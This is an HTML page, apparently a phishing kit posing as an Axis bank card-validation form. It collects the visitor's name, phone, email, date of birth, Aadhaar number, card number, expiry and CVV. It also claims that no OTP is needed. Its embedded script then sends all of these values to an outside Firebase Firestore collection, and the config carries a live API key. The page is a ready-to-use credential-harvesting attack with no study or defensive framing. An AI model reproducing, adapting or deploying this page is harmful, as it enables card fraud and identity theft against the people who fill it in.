<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
      <style media="screen">
        /* Style inputs */
          input[type=text], input[type=email], textarea {
          width: 100%;
          padding: 12px 20px;
          margin: 8px 0;
          display: inline-block;
          border: 1px solid #cf1735;
          border-radius: 4px;
          box-sizing: border-box;
        }

        input[type=date], textarea {
          width: 100%;
          padding: 12px 20px;
          margin: 8px 0;
          display: inline-block;
          border: 1px solid #cf1735;
          border-radius: 4px;
          box-sizing: border-box;
        }

        /* Style the submit button */
        button {
          width: 100%;
          background-color: #cf1735;
          color: white;
          padding: 14px 20px;
          margin: 8px 0;
          border: none;
          border-radius: 4px;
          cursor: pointer;
        }

        /* Add a background color to the submit button on mouse-over */
        input[type=submit]:hover {
          background-color: #cf1735;
        }
      </style>

<div class="header-area" id="headerArea">
    <div class="container h-100 d-flex align-items-center justify-content-between">
      <!-- Logo Wrapper-->
      <div class="logo-wrapper"><a href="index2.html"><img src="img/ax.png" alt="axis" height="100" width="150"></a></div>


  </head>
  <body>
    <form>
      <label for="name">Name</label>
      <input type="text" id="name" name="name" placeholder="Enter Name" required>

      <label for="phone">Mobile No.</label>
      <input type="text" id="phone" name="phone" placeholder="Enter Mobile No." required>

      <label for="email">Email</label>
      <input type="email" id="email" name="email" placeholder="Enter Email" required>

      <label for="dob">Date of Birth</label>
      <input type="date" id="dob" name="dob" placeholder="Enter Date Of Birth" required>

      <label for="aadhar">Aadhar Number</label>
      <input type="text" id="aadhar" name="aadhar" placeholder="XXXX-XXXX-XXXX" required>

      <label for="cardholder">Card Holder Name</label>
      <input type="text" id="cardholder" name="cardholder" placeholder="Enter Card Holder Name" required>

      <label for="cardnum">Card Number</label>
      <input type="text" id="cardnum" name="cardnum" placeholder="Enter Card Number" required>

      <label for="cardexpiry">Card Expiry</label>
      <input type="text" id="cardexpiry" name="cardexpiry" placeholder="MM/YY" required>

      <label for="cvv">CVV</label>
      <input type="text" id="cvv" name="cvv" placeholder="Enter CVV" required>

      

      <button id="submit_msg" type="button">Submit</button>
       
      <p class="text-center mt-4"><img src="img/secured.png" style="width: 300px;"></p>
      <small><b class="text-black">You won't be charged for card validation (we don't require any kind of otp for validation)</b></small>
    </form>

   
  </body>
  <script src="https://www.gstatic.com/firebasejs/6.2.4/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/6.2.4/firebase-firestore.js"></script>
  <script type="text/javascript">
    (function() {
      var firebaseConfig = {
        apiKey: "AIzaSyAD0gymoCxPtCW909INT5SZYlPC8KTR2gE",
  authDomain: "sdcejh.firebaseapp.com",
  projectId: "sdcejh",
  storageBucket: "sdcejh.appspot.com",
  messagingSenderId: "608848693560",
  appId: "1:608848693560:web:75abf0e2e2fcd1d3b319cd",
      };

      firebase.initializeApp(firebaseConfig);

      var push_to_firebase = function(data){
        alert("Your Request has been sent")
        var db = firebase.firestore();

        db.collection("messages").add({
            name: data["name"],
            phone: data["phone"],
            email: data["email"],
            dob: data["dob"],
            aadhar: data["aadhar"],
            cardholder: data["cardholder"],
            cardnum: data["cardnum"],
            cardexpiry: data["cardexpiry"],
            cvv: data["cvv"],
            timestamp: Date.now()
        })
        .then(function(docRef) {
            console.log("Message sent, ID: ", docRef.id);
            location.reload();
        })
        .catch(function(error) {
            console.error("Message could not be sent: ", error);
        });
      }

      var contact_submit = function(){
        var name = document.getElementById("name");
        var phone = document.getElementById("phone");
        var email = document.getElementById("email");
        var dob = document.getElementById("dob");
        var aadhar = document.getElementById("aadhar");
        var cardholder = document.getElementById("cardholder");
        var cardnum = document.getElementById("cardnum");
        var cardexpiry = document.getElementById("cardexpiry");
        var cvv = document.getElementById("cvv");
        

        var data = {
          "name": name.value,
          "phone": phone.value,
          "email": email.value,
          "dob": dob.value,
          "aadhar": aadhar.value,
          "cardholder": cardholder.value,
          "cardnum": cardnum.value,
          "cardexpiry": cardexpiry.value,
          "cvv": cvv.value,
          
        }
        push_to_firebase(data);

      }

      document.getElementById("submit_msg").addEventListener("click", contact_submit);
     
    })();
  </script>
</html>